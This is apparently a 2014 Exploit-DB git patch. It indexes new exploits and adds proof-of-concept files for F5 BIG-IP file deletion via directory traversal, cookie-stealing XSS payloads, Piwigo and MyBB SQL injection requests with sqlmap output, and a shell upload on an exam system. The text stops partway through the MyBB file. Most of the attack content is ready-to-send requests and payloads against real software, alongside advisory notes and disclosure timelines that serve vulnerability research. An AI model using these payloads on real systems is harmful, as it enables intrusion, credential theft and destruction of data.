From da2dbbdc687eb093b67be063635a8671abddbee8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 15 Nov 2014 04:45:59 +0000 Subject: [PATCH] Updated 11_15_2014 --- files.csv | 23 +- platforms/jsp/webapps/35222.txt | 55 ++++ platforms/linux/remote/35232.txt | 7 + platforms/multiple/webapps/35233.txt | 9 + platforms/php/webapps/35138.txt | 21 ++ platforms/php/webapps/35221.txt | 98 ++++++ platforms/php/webapps/35223.txt | 14 + platforms/php/webapps/35224.txt | 195 ++++++++++++ platforms/php/webapps/35227.txt | 15 + platforms/php/webapps/35228.txt | 10 + platforms/php/webapps/35231.txt | 9 + platforms/windows/remote/35213.html | 149 --------- platforms/windows/remote/35225.c | 32 ++ platforms/windows/remote/35226.py | 121 ++++++++ platforms/windows/remote/35229.html | 211 +++++++++++++ platforms/windows/remote/35230.rb | 443 +++++++++++++++++++++++++++ 16 files changed, 1258 insertions(+), 154 deletions(-) create mode 100755 platforms/jsp/webapps/35222.txt create mode 100755 platforms/linux/remote/35232.txt create mode 100755 platforms/multiple/webapps/35233.txt create mode 100755 platforms/php/webapps/35138.txt create mode 100755 platforms/php/webapps/35221.txt create mode 100755 platforms/php/webapps/35223.txt create mode 100755 platforms/php/webapps/35224.txt create mode 100755 platforms/php/webapps/35227.txt create mode 100755 platforms/php/webapps/35228.txt create mode 100755 platforms/php/webapps/35231.txt delete mode 100755 platforms/windows/remote/35213.html create mode 100755 platforms/windows/remote/35225.c create mode 100755 platforms/windows/remote/35226.py create mode 100755 platforms/windows/remote/35229.html create mode 100755 platforms/windows/remote/35230.rb diff --git a/files.csv b/files.csv index 6399e820c..3d76f2053 100755 --- a/files.csv +++ b/files.csv @@ -14128,7 +14128,7 @@ id,file,description,date,author,platform,type,port 16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,metasploit,windows,remote,0 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0 -16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service Impersonation Vulnerability",2011-02-17,metasploit,windows,remote,0 +16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Server Service Relative Path Stack Corruption",2011-01-21,metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0 @@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 18330,platforms/php/webapps/18330.txt,"wordpress pay with tweet plugin <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 -18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro 0day",2012-01-08,"b33f g11tch",windows,local,0 +18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0day)",2012-01-08,"b33f & g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service Vulnerability",2012-01-08,JaMbA,windows,dos,0 @@ -15853,7 +15853,7 @@ id,file,description,date,author,platform,type,port 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal Vulnerability",2012-01-10,chap0,php,webapps,0 -18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 +18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 @@ -19708,7 +19708,7 @@ id,file,description,date,author,platform,type,port 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 Index.CFM SQL Injection Vulnerability",2003-04-14,"Jim Dew",cfm,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0 -22489,platforms/windows/shellcode/22489.cpp,"Windows XP PRO SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0 +22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0 22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 @@ -31656,6 +31656,7 @@ id,file,description,date,author,platform,type,port 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 +35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31711,7 +31712,19 @@ id,file,description,date,author,platform,type,port 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 -35213,platforms/windows/remote/35213.html,"Internet Explorer 8 MS14-035 Use-After-Free Exploit",2014-11-10,"Ayman Sagy",windows,remote,0 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0 +35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 +35224,platforms/php/webapps/35224.txt,"MyBB 1.8.X - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 +35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 +35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 +35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 +35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 +35229,platforms/windows/remote/35229.html,"Internet Explorer <11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0 +35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 +35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 +35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0 +35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 diff --git a/platforms/jsp/webapps/35222.txt b/platforms/jsp/webapps/35222.txt new file mode 100755 index 000000000..9034b3156 --- /dev/null +++ b/platforms/jsp/webapps/35222.txt @@ -0,0 +1,55 @@ ++------------------------------------------------------+ ++ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability + ++------------------------------------------------------+ +Affected Product : F5 BIG-IP +Vendor Homepage : http://www.f5.com/ +Version : 10.1.0 +Vulnerability Category : Local vulnerability +Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] +CVE : CVE-2014-8727 +Patched : Yes + ++-------------+ ++ Description + ++-------------+ +An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device. + ++----------------------+ ++ Exploitation Details + ++----------------------+ +An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level. + +In order to trigger the flaw, send a HTTP GET request similar to: https:///tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd +Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-. + +Sample HTTP POST request: + +POST /tmui/Control/form HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https:///tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd +Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 937 + +_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete + ++----------+ ++ Solution + ++----------+ +F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL: + https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html + https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html + ++---------------------+ ++ Disclosure Timeline + ++---------------------+ +03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com +04-11-2014: Vendor responded with intent to investigate +04-11-2014: Shared details with vendor +05-11-2014: Vendor confirmed the issue is already patched, reference ID363027 +12-11-2014: Public disclosure \ No newline at end of file diff --git a/platforms/linux/remote/35232.txt b/platforms/linux/remote/35232.txt new file mode 100755 index 000000000..8879595ec --- /dev/null +++ b/platforms/linux/remote/35232.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45842/info + +Pango is prone to a remote heap-corruption vulnerability. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +http://www.exploit-db.com/sploits/35232.zip diff --git a/platforms/multiple/webapps/35233.txt b/platforms/multiple/webapps/35233.txt new file mode 100755 index 000000000..0e9ed8ebf --- /dev/null +++ b/platforms/multiple/webapps/35233.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45911/info + +B-Cumulus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E + +http://www.example.com/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/php/webapps/35138.txt b/platforms/php/webapps/35138.txt new file mode 100755 index 000000000..ccdbd598b --- /dev/null +++ b/platforms/php/webapps/35138.txt @@ -0,0 +1,21 @@ +/****************************************************** +# Exploit Title: esotalk cms topics xss vulnerability +# Google Dork: powered by esotalk +# Date: 2014-11-01 +# Vul Author: Evi1m0#ff0000team +# Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html +# Vendor Homepage: http://esotalk.org/ +# Software Link: http://esotalk.org/download +# Tested on: Linux / Windows +******************************************************/ + +esotalk cms topics xss vulnerability. The worst is at the topic page, Submit Comment: + +Payload: + +[url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url] + + +You see an alert. + +Proof img url: http://www.hackersoul.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2.jpg \ No newline at end of file diff --git a/platforms/php/webapps/35221.txt b/platforms/php/webapps/35221.txt new file mode 100755 index 000000000..0cbb6b907 --- /dev/null +++ b/platforms/php/webapps/35221.txt @@ -0,0 +1,98 @@ +============================================= +MGC ALERT 2014-001 +- Original release date: January 12, 2014 +- Last revised: November 12, 2014 +- Discovered by: Manuel García Cárdenas +- Severity: 7,1/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Blind SQL Injection in Piwigo <= v2.6.0 + +II. BACKGROUND +------------------------- +Piwigo is a web application management photo albums, available under the +License GPL. Is written in PHP and requires a MySQL, PostgreSQL or SQLite +data. + +III. DESCRIPTION +------------------------- +This bug was found using the portal without authentication. To exploit the +vulnerability only is needed use the version 1.0 of the HTTP protocol to +interact with the application. It is possible to inject SQL code in the +variable "rate" on the page "picture.php". + +IV. PROOF OF CONCEPT +------------------------- +The following URL's and parameters have been confirmed to all suffer from +Blind SQL injection. + +/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1) + +Exploiting with SQLMap: + +python sqlmap.py -u " +http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate" --data +"rate=1" --dbs + +[16:32:25] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) +web application technology: PHP 5.3.2, Apache 2.2.14 +back-end DBMS: MySQL 5 +[16:32:25] [INFO] fetching database names +[16:32:25] [INFO] fetching number of databases +[16:32:25] [INFO] resumed: 4 +[16:32:25] [INFO] resumed: information_schema +[16:32:25] [INFO] resumed: mysql +[16:32:25] [INFO] resumed: phpmyadmin +[16:32:25] [INFO] resumed: piwigo +available databases [4]: +[*] information_schema +[*] mysql +[*] phpmyadmin +[*] piwigo + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Piwigo <= v2.6.0 + +VII. SOLUTION +------------------------- +All data received by the application and can be modified by the user, +before making any kind of transaction with them must be validated. + +VIII. REFERENCES +------------------------- +http://www.piwigo.org + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +January 21, 2014 1: Initial release + + +XI. DISCLOSURE TIMELINE +------------------------- +January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas +November 12, 2014 2: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/35223.txt b/platforms/php/webapps/35223.txt new file mode 100755 index 000000000..eda1e0e21 --- /dev/null +++ b/platforms/php/webapps/35223.txt @@ -0,0 +1,14 @@ +# Exploit Title: Digi Online Examination System Unrestricted File Upload Vulnerability +# Date: 12-10-2014 +# Exploit Author: Halil Dalabasmaz +# Version: v2.0 +# Software Link: http://codecanyon.net/item/digi-online-examination-system-does/8610180 +# Software Test Link: http://s1.digitalvidhya.com/doesv2/ + +# Vulnerabilities Description: + +===Unrestricted File Upload=== +You can upload your shell from "Photo" section while register the system. And then chekc your shell from here; http://example.com/assets/uploads/images/shellname.php + +=Solution= +Filter the files aganist to attacks. \ No newline at end of file diff --git a/platforms/php/webapps/35224.txt b/platforms/php/webapps/35224.txt new file mode 100755 index 000000000..bbc56f0a9 --- /dev/null +++ b/platforms/php/webapps/35224.txt @@ -0,0 +1,195 @@ +#Title: MyBB 1.8.X - Multiple Vulnerabilities +#Date: 13.11.2014 +#Tested on: Linux / Apache 2.2 / PHP 5 (localhost) +#Vendor: mybb.com +#Version: => 1.8.1 - Latest ATM +#Contact: smash@devilteam.pl +#Author: Smash_ + + +Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on. + +Sanitize your inputs ;) + + +1. SQL Injection + +Vuln: +POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1# + +#1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#): +POST /mybb-1.8.1/member.php HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 408 + +regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register + +#1 - Response: +HTTP/1.1 503 Service Temporarily Unavailable +Date: Thu, 13 Nov 2014 15:16:02 GMT +
+

MyBB SQL Error

+ +
+

MyBB has experienced an internal SQL error and cannot continue.

+
SQL Error:
+
1054 - Unknown column '9' in 'order clause'
+
Query:
+ SELECT q.*, s.sid + FROM mybb_questionsessions s + LEFT JOIN mybb_questions q ON (q.qid=s.qid) + WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#' + + + +#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#): +POST /mybb-1.8.1/member.php HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 409 + +regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register + +#2 - Response: +HTTP/1.1 200 OK +Date: Thu, 13 Nov 2014 15:21:15 GMT +(...) + + + +Forums - Registration + + +#3 - Request (Final POC): +POST /mybb-1.8.1/member.php HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 475 + +regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register + +#3 - Response: +HTTP/1.1 503 Service Temporarily Unavailable +Date: Thu, 13 Nov 2014 15:24:34 GMT +(...) +
+

MyBB SQL Error

+ +
+

MyBB has experienced an internal SQL error and cannot continue.

+
SQL Error:
+
1062 - Duplicate entry 'mybb:1' for key 'group_key'
+
Query:
+
+ SELECT q.*, s.sid + FROM mybb_questionsessions s + LEFT JOIN mybb_questions q ON (q.qid=s.qid) + WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#' +
+
+(...) + + + +2. Cross Site Scripting + + a) Reflected XSS - Report post + +Vuln: +GET 'type' - XSS"> + +localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 + +Request: +GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1 +Host: localhost + +Response: +HTTP/1.1 200 OK +Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly +Content-Length: 1247 +Content-Type: text/html + +